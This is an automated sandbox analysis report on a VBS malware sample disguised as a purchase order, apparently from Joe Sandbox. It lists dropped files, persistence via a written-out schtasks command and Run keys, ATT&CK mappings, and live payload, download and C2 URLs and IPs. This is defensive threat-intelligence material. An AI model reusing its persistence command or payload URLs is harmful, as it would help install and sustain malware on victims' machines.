                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00208E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00208E3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00208E19 SetUnhandledExceptionFilter,22_2_00208E19

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\System32\wscript.exe File created: RNEQTT[1].exe.0.dr
                                Source: C:\Windows\System32\wscript.exe Network Connect: 185.199.108.133 443
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021BE95 LogonUserW,7_2_0021BE95
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,7_2_001E374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00224B52 SendInput,keybd_event,7_2_00224B52
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00227DD5 mouse_event,7_2_00227DD5
                                Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,7_2_0021B398
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_0021BE31
                                Source: ._cache_update.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_update.exe, 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp, NUHORT.exe, 00000010.00000002.1960481113.0000000000EAE000.00000040.00000001.01000000.0000000C.sdmp, NUHORT.exe, 00000013.00000002.2012971999.0000000000EAE000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00207254 cpuid 7_2_00207254
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002040DA GetSystemTimeAsFileTime,__aulldiv,7_2_002040DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0025C146 GetUserNameW,7_2_0025C146
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00212C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,7_2_00212C3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_001FE47B
                                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: ._cache_update.exe, 00000007.00000002.2965345252.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 3104, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 0.3.wscript.exe.229973aa684.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: update.exe PID: 5592, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4F1F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, type: DROPPED
                                Source: NUHORT.exe, 0000001A.00000002.2959933261.0000000000EAE000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: NUHORT.exe, 0000001A.00000003.2944800094.0000000004031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: ._cache_update.exeBinary or memory string: WIN_XP
                                Source: ._cache_update.exeBinary or memory string: WIN_XPe
                                Source: ._cache_update.exeBinary or memory string: WIN_VISTA
                                Source: NUHORT.exe, 00000015.00000002.2183774646.00000000047D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81[
                                Source: ._cache_update.exe, 00000016.00000003.2249565360.00000000042FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81.
                                Source: ._cache_update.exeBinary or memory string: WIN_7
                                Source: ._cache_update.exeBinary or memory string: WIN_8
                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 3104, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 3104, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 0.3.wscript.exe.229973aa684.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: update.exe PID: 5592, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4F1F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,7_2_002391DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_002396E2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,16_2_00E591DC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00E596E2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,22_2_002391DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,22_2_002396E2
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 631 Scripting | 2 Valid Accounts | 11 Windows Management Instrumentation | 631 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | 1 Replication Through Removable Media | 3 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 2 Valid Accounts | 1 Extra Window Memory Injection | 31 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 2 Valid Accounts | 1 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 314 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 121 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 28 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 112 Process Injection | 1 Extra Window Memory Injection | Cached Domain Credentials | 251 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 12 Masquerading | DCSync | 121 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 121 Registry Run Keys / Startup Folder | 2 Valid Accounts | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 121 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 112 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph (ID: 1580572). Sample: Purchase Order No. G0287336... Startdate: 25/12/2024. Architecture: WINDOWS. Score: 100]

Source | Detection | Scanner | Label | Link
Purchase Order No. G02873362-Docx.vbs | 37% | Virustotal | | Browse
Purchase Order No. G02873362-Docx.vbs | 29% | ReversingLabs | Win32.Trojan.Valyria |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\VFNCBO.vbs | 100% | Avira | VBS/Runner.VPJI |
C:\ProgramData\Synaptics\RCX4F1F.tmp | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\RCX4F1F.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\Documents\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\Documents\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\RCX4F1F.tmp | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Documents\~$cache1 | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCX4F1F.tmp | 100% | ReversingLabs | Win32.Worm.Zorex |
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | 53% | ReversingLabs | Win32.Trojan.Lisk |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | 53% | ReversingLabs | Win32.Trojan.Lisk |
C:\Users\user\Documents\~$cache1 | 100% | ReversingLabs | Win32.Worm.Zorex |
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://drive.userco | 0% | Avira URL Cloud | safe |
http://xred.site50.net/syn/SSLLibrary.dl | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/Synaptics.rar | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SSLLibrary.dll | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SUpdate.ini | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.181.14 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | high
drive.usercontent.google.com | 142.250.181.97 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe | false | | high
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.199.108.133 | raw.githubusercontent.com | Netherlands | | 54113 | FASTLYUS | false
142.250.181.14 | docs.google.com | United States | | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | | 3223 | VOXILITYGB | true
142.250.181.97 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | | 17048 | AWKNET-LLCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580572
Start date and time: 2024-12-25 09:06:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase Order No. G02873362-Docx.vbs
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.winVBS@25/34@22/5
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 99%
                                                                                                                                        • Number of executed functions: 92
                                                                                                                                        • Number of non-executed functions: 279
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .vbs
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 20.189.173.10, 172.202.163.200, 20.190.177.147, 23.218.208.109, 13.107.246.63
                                                                                                                                        • Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdwus09.westus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, ukw-azsc-config.officeapps.live.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:07:21 | API Interceptor | 963x Sleep call for process: Synaptics.exe modified
08:07:05 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
08:07:18 | Task Scheduler | Run new task: VFNCBO.exe path: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
08:07:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VFNCBO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
08:07:27 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
08:07:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VFNCBO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
08:07:43 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
08:07:51 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFNCBO.lnk
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        172.111.138.100New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                          RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                            Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                              Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                  gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    dlawt.exeGet hashmaliciousLodaRatBrowse
                                                                                                                                                      nXi3rwhMmB.exeGet hashmaliciousLodaRatBrowse
                                                                                                                                                        69.42.215.252blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        raw.githubusercontent.comYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.109.133
                                                                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.111.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        s-part-0035.t-0009.t-msedge.netblq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
